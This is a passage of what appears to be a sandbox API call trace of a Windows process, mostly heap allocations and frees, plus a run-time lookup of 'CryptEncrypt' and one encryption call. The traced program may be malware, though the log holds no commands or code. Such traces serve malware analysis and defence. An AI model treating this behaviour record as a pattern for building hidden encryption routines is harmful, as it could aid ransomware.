lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0262.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0262.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0262.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0262.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0262.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0262.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0262.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0262.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0262.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0262.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0262.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0262.238] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0262.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0262.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0262.238] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0262.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0262.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0262.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0262.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0262.238] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0262.238] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0262.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0262.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0262.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0262.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0262.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0262.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d920 [0262.239] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.239] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0262.239] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0262.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0262.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0262.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0262.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0262.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2090 [0262.239] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0262.239] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0262.239] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0262.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a8dc0 [0262.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0262.239] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0262.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0262.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20a0 [0262.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0262.240] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0262.240] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20b0 [0262.240] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0262.240] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0262.240] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0262.240] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0262.240] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0262.240] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0262.240] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0262.240] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0262.240] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0262.240] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0262.240] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0262.240] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0262.241] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0262.241] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0262.241] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0262.241] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0262.241] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0262.241] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0262.241] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0262.241] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0262.241] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0262.241] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0262.241] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0262.241] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0262.241] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0262.242] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0262.242] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0262.242] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0262.242] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0262.242] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0262.242] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0262.242] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0262.242] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0262.242] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0262.242] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0262.242] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0262.242] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0262.242] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0262.242] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0262.243] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0262.243] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0262.243] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0262.243] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0262.243] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0262.243] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0262.243] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0262.243] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0262.243] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0262.243] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0262.243] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24c9698 | out: hHeap=0x25c0000) returned 1 [0262.243] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0262.243] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0262.244] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0262.244] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0262.244] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0262.244] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0262.244] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0262.244] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0262.244] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0262.244] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0262.244] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0262.244] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0262.244] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0262.244] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0262.244] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0262.244] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0262.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0262.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0262.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0262.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0262.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0262.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0262.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0262.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0262.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0262.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0262.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0262.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0262.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0262.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0262.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0262.246] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20e0 | out: hHeap=0x25c0000) returned 1 [0262.246] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0262.246] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0262.246] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0262.246] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0262.246] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20f0 | out: hHeap=0x25c0000) returned 1 [0262.246] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0262.246] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0262.246] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0262.246] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2100 | out: hHeap=0x25c0000) returned 1 [0262.246] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0262.246] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0262.246] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0262.246] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2110 | out: hHeap=0x25c0000) returned 1 [0262.246] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0262.246] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x24a9e58, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0262.247] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0262.247] GetProcAddress (hModule=0x74d40000, lpProcName="CryptEncrypt") returned 0x74d6779b [0262.247] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0262.247] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2110 | out: hHeap=0x25c0000) returned 1 [0262.247] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2110 | out: hHeap=0x25c0000) returned 1 [0262.247] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0262.247] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2120 | out: hHeap=0x25c0000) returned 1 [0262.247] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2130 | out: hHeap=0x25c0000) returned 1 [0262.247] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0262.247] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0262.247] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2160 | out: hHeap=0x25c0000) returned 1 [0262.247] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0262.247] CryptEncrypt (in: hKey=0xaa5760, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8bef68*=0x8e1e, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8bef68*=0x8e20) returned 1 [0262.248] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0262.248] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0262.248] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2160 [0262.248] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0262.248] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0262.248] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0262.248] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2150 [0262.248] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0262.248] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0262.248] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0262.248] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0262.248] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0262.248] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0262.248] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2150 [0262.248] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0262.248] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0262.248] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0262.249] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0262.249] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0262.249] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0262.249] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2150 [0262.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0262.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0262.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0262.249] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0262.249] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0262.249] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0262.249] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2150 [0262.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0262.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0262.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0262.249] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0262.249] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0262.249] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0262.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2150 [0262.250] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0262.250] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0262.250] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0262.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0262.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0262.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0262.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2150 [0262.250] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0262.250] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0262.250] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0262.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0262.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0262.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0262.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2150 [0262.250] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0262.250] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0262.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0262.251] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0262.251] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0262.251] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0262.251] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2150 [0262.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0262.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0262.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0262.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0262.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0262.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 